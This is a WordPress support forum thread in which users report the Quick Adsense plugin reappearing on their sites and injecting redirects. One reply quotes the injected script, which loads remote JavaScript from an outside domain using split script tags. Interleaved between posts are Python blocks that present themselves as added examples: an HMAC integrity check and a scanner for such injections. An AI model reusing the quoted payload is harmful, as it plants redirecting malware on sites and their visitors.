Title: Plugin installed without authorisation
Last modified: August 5, 2022

---

# Plugin installed without authorisation

 *  [jeslabbert](https://wordpress.org/support/users/jeslabbert/)
 * (@jeslabbert)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/)
 * This plugin has been automatically installed on a website we administer twice
   now and both times it has been used to run a JS exploit that redirects users 
   away.
 * This is a dangerous plugin.

Viewing 7 replies - 1 through 7 (of 7 total)

 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15890043)
 * Please secure your website. What you are saying is technically impossible to 
   do for a plugin.
 *  Thread Starter [jeslabbert](https://wordpress.org/support/users/jeslabbert/)
 * (@jeslabbert)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15890124)
 * I am securing it. The only thing that breaks my website on the front end is a
   JavaScript injection from your plugin. I have blocked this plugin from being 
   installed, but it is vulnerable to exploits.
 *  [vcompdev](https://wordpress.org/support/users/vcompdev/)
 * (@vcompdev)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15891782)
 * I have been having the same issue for a few days now. When someone goes to my
   site, it redirects them to spam ads. I just changed my passwords so let’s see
   if that works.
 * I keep deleting the plugin and it keeps re-installing itself.
 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15891840)
 * What you guys are claiming is technically impossible. A plugin cannot install
   by itself. It seems your sites have been hacked and someone is installing the
   plugin on your sites to insert their ads. It's not possible for any plugin to 
   install by itself unless there is some code already on the site which can do 
   it.
 * Also, Quick Adsense had a full security audit just a couple of months back from the
   WordPress plugin team and the plugin adheres to all WordPress plugin guidelines.
   Anyone is welcome to security audit the code. These are unfortunate allegations
   which have nothing to do with any plugin.
 *  [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * (@tonnick0033)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16000741)
 * Same issue here. Seems that this plugin is too easy to configure with SQL injection
   to insert malicious JS.
 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16000787)
 * Can you help me with where the malicious code was inserted? Header / Footer /
   In one of the Ad Slots?
 * This is really weird in the sense that if someone malicious has elevated themselves
   with the permission to install plugins, why would they alter a plugin's code to 
   insert their ads instead of directly editing your theme? I am assuming whoever
   is doing this is doing it to prevent detection.
 * Having received three reports about this, I will add a feature to verify the 
   authenticity of the data with a hash in the next version (which probably is the
   first for any plugin), but it's more important to actually figure out how someone
   is getting elevated permission to perform this database update.
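
The integrity check proposed in the reply above, sketched as an added example that is not part of the thread and is not Quick Adsense's code. It assumes a hypothetical settings row and a key kept outside the database, and compares a plain hash with a keyed MAC when the stored data is changed by a direct database update.

```python
import hashlib
import hmac
import json

# Assumption: the key is stored outside the database (for instance in a
# config file), so database write access alone does not reveal it.
SECRET_KEY = b"constructed-demo-key-not-a-real-secret"

def canonical(settings):
    """Serialise deterministically so equal settings give equal digests."""
    return json.dumps(settings, sort_keys=True, separators=(",", ":")).encode("utf-8")

def seal(settings, key=SECRET_KEY):
    """Build the stored row: settings plus an unkeyed hash and a keyed MAC."""
    blob = canonical(settings)
    return {
        "settings": settings,
        "sha256": hashlib.sha256(blob).hexdigest(),
        "hmac": hmac.new(key, blob, hashlib.sha256).hexdigest(),
    }

def plain_hash_ok(row):
    """Check the unkeyed hash stored next to the data."""
    digest = hashlib.sha256(canonical(row["settings"])).hexdigest()
    return hmac.compare_digest(digest, row["sha256"])

def hmac_ok(row, key=SECRET_KEY):
    """Check the keyed MAC; only a holder of the key can produce a valid one."""
    expected = hmac.new(key, canonical(row["settings"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, row["hmac"])

def modified_in_database(row, field, value):
    """Model a direct database update: every stored column can be rewritten,
    including the unkeyed hash, but the MAC cannot be recomputed without the key."""
    settings = dict(row["settings"], **{field: value})
    return {
        "settings": settings,
        "sha256": hashlib.sha256(canonical(settings)).hexdigest(),
        "hmac": row["hmac"],
    }
```

A plugin using this pattern would refuse to output any slot whose row fails `hmac_ok` and surface the failure to the administrator.
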
 *  [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * (@tonnick0033)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16001301)
 * Code has been inserted in header/footer codes + in “ads posts body” slots. As
   no widget has been added, the code was coming from the header one. The first 3
   slots were fed + the last one 🙂 just in case we miss it deleting the code 😀
 * That way, there is no malicious code in PHP files. This does not hit PHP scanner.
 * The malicious code gets inside the database using your plugin 🙁
 * Here is an example of the code inserted:
 *     ```
       "<script type="text/javascript">
       	atOptions = {
       		'key' : '4daf1db77f85db185034cebc94b70b32',
       		'format' : 'iframe',
       		'height' : 600,
       		'width' : 160,
       		'params' : {}
       	};
       	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://intersectionweigh.com/4daf1db77f85db185034cebc94b70b32/invoke.js"></scr' + 'ipt>');
       </script>"
       ```
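
Because the injected markup described above sits in database-stored plugin settings rather than in PHP files, a file scanner will not see it. The following check over exported option values is an added example, not part of the thread or of the plugin; the field names, the allowlist and the sample rows are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only script host this site's ad slots legitimately load from.
ALLOWED_HOSTS = {"pagead2.googlesyndication.com"}
# document.write() emitting a script tag split into pieces: '<scr' + 'ipt'
SPLIT_TAG = re.compile(r"document\.write\s*\(.*<\s*scr['\"]\s*\+\s*['\"]ipt", re.I | re.S)
# Host part of a URL assembled by string concatenation: '://host/path'
CONCAT_HOST = re.compile(r"://([a-z0-9.-]+\.[a-z]{2,})", re.I)

class ScriptHosts(HTMLParser):
    """Collect the host of every <script src=...> tag in a stored value."""
    def __init__(self):
        super().__init__()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            # Protocol-relative URLs (//host/x.js) need a scheme to parse.
            host = urlparse(src if "://" in src else "https:" + src).hostname
            if host:
                self.hosts.add(host)

def scan_value(value):
    """Return findings for one stored option value (empty list means clean)."""
    parser = ScriptHosts()
    parser.feed(value)
    parser.close()
    findings, hosts = [], set(parser.hosts)
    if SPLIT_TAG.search(value):
        findings.append("split-script-tag")
        hosts.update(h.lower() for h in CONCAT_HOST.findall(value))
    findings += ["unapproved-host:" + h for h in sorted(hosts - ALLOWED_HOSTS)]
    return findings

# Constructed sample rows (field name -> stored value); hosts are placeholders.
SAMPLE_OPTIONS = {
    "ad_slot_1": '<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>',
    "header_code": "<script>document.write('<scr' + 'ipt src=\"http' + 's' + '://cdn.example.invalid/k/invoke.js\"></scr' + 'ipt>');</script>",
    "footer_code": '<script src="//tracker.example.invalid/t.js"></script>',
}

def scan_options(options):
    """Map each field with at least one finding to its list of findings."""
    scanned = ((name, scan_value(value)) for name, value in options.items())
    return {name: found for name, found in scanned if found}
```
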
   


The topic ‘Plugin installed without authorisation’ is closed to new replies.

 * 10 replies
 * 4 participants
 * Last reply from: [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * Last activity: [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16001301)
 * Status: not a support question